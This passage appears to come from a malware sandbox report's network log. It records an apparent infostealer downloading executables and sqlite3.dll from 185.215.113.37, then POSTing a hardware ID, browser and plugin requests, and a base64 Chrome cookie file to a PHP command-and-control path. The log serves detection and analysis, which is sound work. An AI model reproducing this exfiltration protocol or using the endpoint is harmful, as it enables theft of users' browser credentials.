06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:29 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:31 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 09:02:32 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEHCGHIIIDHIECFHJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 46 34 30 33 34 44 42 35 46 45 31 30 33 30 33 36 31 34 34 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 48 43 47 48 49 49 49 44 48 49 45 43 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="hwid"88F4034DB5FE1030361446------DBAEHCGHIIIDHIECFHJDContent-Disposition: form-data; name="build"doma------DBAEHCGHIIIDHIECFHJD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIECGIEBKJJJJKEGHJHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 45 43 47 49 45 42 4b 4a 4a 4a 4a 4b 45 47 48 4a 2d 2d 0d 0a Data Ascii: ------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------JDGIECGIEBKJJJJKEGHJContent-Disposition: form-data; name="message"browsers------JDGIECGIEBKJJJJKEGHJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 48 44 42 4b 46 43 41 41 45 43 42 46 49 44 48 4a 2d 2d 0d 0a Data Ascii: ------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------IJKFHDBKFCAAECBFIDHJContent-Disposition: form-data; name="message"plugins------IJKFHDBKFCAAECBFIDHJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="message"fplugins------CFHCGHJDBFIIDGDHIJDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAFHost: 185.215.113.37Content-Length: 7051Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBGHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Y
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGHIJDGCBAAAAAFIJDHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 48 49 4a 44 47 43 42 41 41 41 41 41 46 49 4a 44 2d 2d 0d 0a Data Ascii: ------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="token"e54312f23a569b871fc226684235b0f5964114dc4a47f1fcc781a3fcb560d43be49d8610------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HJDGHIJDGCBAAAAAFIJDContent-Disposition: form-data; name="file"------HJDGHIJDGCBAAAAAFIJD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 35 34 33 31 32 66 32 33 61 35 36 39 62 38 37 31 66 63 32 32 36 36 38 34 32 33 35 62 30 66 35 39 36 34 31 31 34 64 63 34 61 34 37 66 31 66 63 63 37 38 31 61 33 66 63 62 35 36 30 64 34 33 62 65 34 39 64 38 36 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 